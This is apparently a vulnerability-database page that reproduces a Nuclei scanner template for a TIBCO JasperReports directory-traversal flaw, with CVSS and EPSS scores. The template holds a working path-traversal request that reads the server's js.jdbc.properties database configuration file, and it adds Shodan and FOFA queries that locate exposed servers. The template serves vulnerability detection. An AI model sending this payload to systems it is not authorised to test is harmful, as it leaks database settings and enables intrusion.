Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-18809
HistoryAug 03, 2023 - 11:24 p.m.

TIBCO JasperReports Library - Directory Traversal

2023-08-0323:24:34
ProjectDiscovery
github.com
18
tibco
jasperreports
directory traversal
vulnerability
web server
host system
security

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

6.6 Medium

AI Score

Confidence

High

0.503 Medium

EPSS

Percentile

97.5%

The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system.
id: CVE-2018-18809

info:
  name: TIBCO JasperReports Library - Directory Traversal
  author: DhiyaneshDK
  severity: medium
  description: |
    The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system.
  impact: |
    An attacker can access sensitive files, potentially leading to unauthorized disclosure of sensitive information.
  remediation: |
    Apply the latest security patches or upgrade to a patched version of TIBCO JasperReports Library.
  reference:
    - https://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html
    - https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-18809
    - http://packetstormsecurity.com/files/154406/Tibco-JasperSoft-Path-Traversal.html
    - http://seclists.org/fulldisclosure/2019/Sep/17
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2018-18809
    cwe-id: CWE-22
    epss-score: 0.50316
    epss-percentile: 0.97524
    cpe: cpe:2.3:a:tibco:jasperreports_library:*:*:*:*:activematrix_bpm:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: tibco
    product: jasperreports_library
    shodan-query:
      - html:"jasperserver-pro"
      - http.html:"jasperserver-pro"
    fofa-query: body="jasperserver-pro"
  tags: cve2018,cve,packetstorm,seclists,lfi,kev,jasperserver,jasperreport,tibco

http:
  - method: GET
    path:
      - "{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "metadata.jdbc.driverClassName"
          - "metadata.hibernate.dialect"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100803bf8360cb7071f91b5033f54e04080f5ceb4dd645c8d7a14d652192cb130a8022020dd215c39c6d85861fe99504d663c6dfdc065fc06b02d3a73e325b842b014db:922c64590222798bb761d5b6d8e72950

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

6.6 Medium

AI Score

Confidence

High

0.503 Medium

EPSS

Percentile

97.5%